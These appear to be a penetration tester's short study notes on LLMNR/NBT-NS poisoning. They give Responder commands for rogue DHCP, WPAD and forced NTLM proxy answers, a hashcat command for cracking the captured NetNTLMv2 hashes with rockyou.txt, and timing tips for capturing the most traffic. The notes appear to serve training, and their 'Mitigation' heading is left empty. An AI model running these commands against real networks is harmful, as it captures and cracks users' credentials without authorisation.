Also known as NBT-NS in older networks. Enabled default. Broadcasts where to find files or domains when DNS fails to ID. Can be intercepted by Man-in-the-middle, and the hash can be reversed/cracked using something like hashcat and rockyou.txt!
sudo responder -I tun0 -dwPv-I is for interface which can be:
tun0 is from remote (tunnel 0)
OR
eth0 if local (ethernet 0).
-dwPv
-d enables answers for DHCP broadcast requests. (—DHCP)
-w start the WPAD rogue proxy server (—wpad). Allows browser to find proxy without additional config
-P Force NTLM authentication for the proxy. Highly effective (—ProxyAuth)
-v for verbose. Without this, once it captures a hash, it does not capture it again.
To find what the -something means, we can always do
Gives error as of 4/9/2024. New commands that work:
sudo responder -I tun0 -dwv
sudo responder -I tun0 -dPvsudo responder —helpHashcat command:
hashcat -m 5600 hashes.txt rockyou.txthashes.txt would include the hashes we want to crack.
The best time to run this (called Responder.py) would be in the morning or after lunch when users generate lots of traffic.
Mitigation